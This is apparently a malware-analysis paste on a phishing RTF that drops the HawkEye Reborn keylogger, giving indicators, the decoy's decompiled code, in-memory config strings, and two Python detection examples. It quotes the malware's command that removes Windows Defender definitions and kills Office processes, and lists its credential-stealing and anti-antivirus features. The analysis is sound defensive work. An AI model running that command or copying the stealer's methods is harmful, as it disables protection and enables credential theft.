- found by @neonprimetime security
- #rtf
- 6/5/2018 email subject "R.F.Q. for the contract project procurement exercise ..."
- 7f51124e0d15008cacd0a407d2ca9bf8
- https://www.hybrid-analysis.com/sample/4eb5a28d72f55c6e8d4d80c650547266e6c9aa0b2a73f9253f3cc2a61010886f?environmentId=100
- https://app.any.run/tasks/0b2f956d-d4a9-4672-98c3-c2c27cf1d718
- opens Excel
- downloads
- hxxp://stemtopx.com/work/new/14.exe
- 46B255CB008D99DA1D0FE1EB51006A6A
- copies itself to and runs from
- C:\Users\Win732\AppData\Roaming\Microsoft\Windows\DsvHelper\filename.exe
- also seen
- C:\Users\Public\Host32.exe
- EBDC467745BFCD089E1337D79A5AB422
- runs this command (wipes Windows Defender's signature definitions with MpCmdRun.exe, then force-kills Word, Excel and Publisher)
- "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit
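- Added example (not from the paste or its author): Python triage logic over process-creation command lines that flags the pattern above, i.e. MpCmdRun.exe -RemoveDefinitions combined with taskkill of Office images in one cmd.exe invocation. The sample lines, image set and severity tiers are constructed for the demo; only the first line is the command observed in the paste.

```python
import re

# Constructed process-creation command lines for the demo (not real telemetry).
# [0] is the command observed in the paste; the rest are lookalikes to show the
# logic does not fire on an ordinary signature update or a single taskkill.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate',
    r'taskkill /f /im notepad.exe',
    r'"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'taskkill /f /im winword.exe',
]

# Office images the observed command terminates (set chosen for the demo).
OFFICE_IMAGES = {"winword.exe", "excel.exe", "mspub.exe", "powerpnt.exe", "outlook.exe"}

# taskkill [/switches ...] /im <image>
TASKKILL_RE = re.compile(r"taskkill\s+(?:/\w+\s+)*/im\s+(\S+)", re.IGNORECASE)


def analyse_cmdline(cmdline):
    """Extract the two indicators: Defender definition removal and Office taskkills."""
    lower = cmdline.lower()
    remove_defs = "mpcmdrun.exe" in lower and "-removedefinitions" in lower
    killed = {m.group(1).lower().strip('"') for m in TASKKILL_RE.finditer(cmdline)}
    return {
        "remove_definitions": remove_defs,
        "office_kills": sorted(killed & OFFICE_IMAGES),
        "other_kills": sorted(killed - OFFICE_IMAGES),
    }


def classify(cmdline):
    """high: both indicators in one command line (the paste's pattern);
    medium: definition removal alone (rare, but an admin can legitimately do it);
    none: everything else, including a lone taskkill of an Office process."""
    ind = analyse_cmdline(cmdline)
    if ind["remove_definitions"] and ind["office_kills"]:
        return "high"
    if ind["remove_definitions"]:
        return "medium"
    return "none"


def triage(cmdlines):
    """Return only the lines worth an analyst's attention, with their verdict."""
    return [(classify(c), c) for c in cmdlines if classify(c) != "none"]


if __name__ == "__main__":
    for verdict, line in triage(SAMPLE_CMDLINES):
        print(verdict, line[:80])
```

- In production telemetry add the parent process to the rule: here the parent is the dropped .NET payload, not an admin console, which is what separates this from a troubleshooting session that runs -RemoveDefinitions by hand.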
- ----------
- 14.exe is a .NET assembly, so it decompiles; the code is wrapped in what looks like a German shutdown-timer app, class
- WindowsApplication1.Shutdown_manager
- public static byte[] FJaioefgkaoeK(byte[] Data)   (randomised method name, consistent with the ConfuserEx marker seen in memory)
- {
- ....
- MyProject.Forms.Form1.TrackBar1.Value = Conversions.ToInteger(MyProject.Forms.Shutdown_manager.INI_ReadValueFromFile("Startseite", "Url", "", ".\\Configurations datei.ini"));
- MyProject.Forms.Shutdown_manager.Herunterfahren.Stop();
- MyProject.Forms.Shutdown_manager.Neustarten.Stop();
- Interaction.MsgBox("Bitte geben sie eine zeit an!", MsgBoxStyle.Exclamation, "Countdown Konnte nicht eingeleitet werden!");
- ....
- }
- (German strings in the decoy, translated: "Startseite" = "Start page", "Configurations datei.ini" = "Configurations file.ini", Herunterfahren = Shutdown, Neustarten = Restart, "Bitte geben sie eine zeit an!" = "Please enter a time!", "Countdown Konnte nicht eingeleitet werden!" = "Countdown could not be started!")
- --------
- interesting in-memory strings (format: offset (byte length): value; the HawkEye banner and pomf.cat URLs are listed at twice their character count, so they sit in memory as UTF-16LE .NET user strings, while the _... config field names are single-byte metadata names)
- --------
- 0x29f1c93 (17): ConfuserEx v1.0.0
- 0x29f22c0 (104): HawkEye Keylogger - Reborn v8 - {0} Logs - {1} \ {2}
- 0x29f2329 (122): HawkEye Keylogger - Reborn v8{0}{1} Logs{0}{2} \ {3}{0}{0}{4}
- 0x29f244f (52): http://pomf.cat/upload.php
- 0x29f2484 (38): https://a.pomf.cat/
- 0x29f29d7 (26): passwordfile
- 0x2b381b0 (14): _EmailUsername
- 0x2b381bf (14): _EmailPassword
- 0x2b381ce (12): _EmailServer
- 0x2b381db (10): _EmailPort
- 0x2b381f0 (10): _FTPServer
- 0x2b381fb (12): _FTPUsername
- 0x2b38208 (12): _FTPPassword
- 0x2b38231 (12): _ProxySecret
- 0x2b38248 (12): _PanelSecret
- 0x2b38255 (12): _LogInterval
- 0x2b38262 (16): _PasswordStealer
- 0x2b38273 (16): _KeyStrokeLogger
- 0x2b38284 (16): _ClipboardLogger
- 0x2b38295 (17): _ScreenshotLogger
- 0x2b382a7 (13): _WebCamLogger
- 0x2b382b5 (11): _SystemInfo
- 0x2b382ca (16): _InstallLocation
- 0x2b382db (14): _InstallFolder
- 0x2b382ea (16): _InstallFileName
- 0x2b382fb (15): _InstallStartup
- 0x2b3830b (26): _InstallStartupPersistance
- 0x2b38326 (15): _HistoryCleaner
- 0x2b38352 (10): _Disablers
- 0x2b3835d (19): _DisableTaskManager
- 0x2b38371 (21): _DisableCommandPrompt
- 0x2b38387 (15): _DisableRegEdit
- 0x2b38397 (18): _ProcessProtection
- 0x2b383aa (17): _ProcessElevation
- 0x2b383bc (16): _AntiVirusKiller
- 0x2b383cd (10): _BotKiller
- 0x2b383d8 (13): _AntiDebugger
- 0x2b383e6 (15): _ExecutionDelay
- 0x2b383f6 (16): _FakeMessageShow
- 0x2b38407 (17): _FakeMessageTitle
- 0x2b38419 (16): _FakeMessageText
- 0x2b3842a (16): _FakeMessageIcon
- 0x2b3843b (15): _WebsiteVisitor
- 0x2b3844b (22): _WebsiteVisitorVisible
- 0x2b38462 (20): _WebsiteVisitorSites
- 0x2b38477 (15): _WebsiteBlocker
- 0x2b38487 (20): _WebsiteBlockerSites
- 0x2b3849c (11): _FileBinder
- 0x2b384a8 (16): _FileBinderFiles
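- Added example (not from the paste or its author): a Python scanner that looks for the HawkEye Reborn banner and config field names above in a memory dump, searching each needle in both ASCII and UTF-16LE since the dump shows both encodings. The sample buffer is constructed for the demo and stands in for an unpacked process dump; the marker list, minimum field count and verdict labels are this example's choices.

```python
import re

# Strings the paste reports in the unpacked process memory. The banner and the
# pomf.cat URLs were dumped at twice their character count (UTF-16LE .NET user
# strings); the _Config field names are single-byte metadata names.
MARKERS = ["HawkEye Keylogger - Reborn v8", "pomf.cat", "ConfuserEx"]
CONFIG_FIELDS = [
    "_EmailUsername", "_EmailPassword", "_EmailServer", "_FTPServer",
    "_PanelSecret", "_PasswordStealer", "_KeyStrokeLogger", "_ClipboardLogger",
    "_ScreenshotLogger", "_WebCamLogger", "_AntiVirusKiller", "_BotKiller",
    "_InstallStartupPersistance",  # the builder's own spelling, kept verbatim
]
ENCODINGS = ("ascii", "utf-16-le")


def find_strings(buf, needles):
    """Map each needle to the (offset, encoding) pairs where it occurs in buf."""
    hits = {}
    for s in needles:
        for enc in ENCODINGS:
            for m in re.finditer(re.escape(s.encode(enc)), buf):
                hits.setdefault(s, []).append((m.start(), enc))
    return hits


def score_sample(buf, min_fields=4):
    """Flag a buffer as HawkEye Reborn only when the banner and enough of the
    builder's config fields co-occur; ConfuserEx alone is a legitimate obfuscator."""
    markers = find_strings(buf, MARKERS)
    fields = find_strings(buf, CONFIG_FIELDS)
    banner = "HawkEye Keylogger - Reborn v8" in markers
    verdict = "hawkeye_reborn" if banner and len(fields) >= min_fields else "unknown"
    return {"markers": sorted(markers), "config_fields": sorted(fields), "verdict": verdict}


# Constructed stand-in for a process memory dump (not the real sample): filler
# plus the paste's strings in the encodings the byte lengths imply.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"ConfuserEx v1.0.0\x00"
    + "HawkEye Keylogger - Reborn v8 - {0} Logs - {1} \\ {2}".encode("utf-16-le")
    + b"\x00" * 16
    + "http://pomf.cat/upload.php".encode("utf-16-le")
    + b"".join(f.encode("ascii") + b"\x00" for f in CONFIG_FIELDS)
    + b"\xff" * 32
)

if __name__ == "__main__":
    print(score_sample(SAMPLE_DUMP))
```

- Run this against a dump taken after the ConfuserEx layer has unpacked (a dump from the sandbox run, as in the paste), not against 14.exe on disk, where the names are obfuscated and the user strings are encrypted.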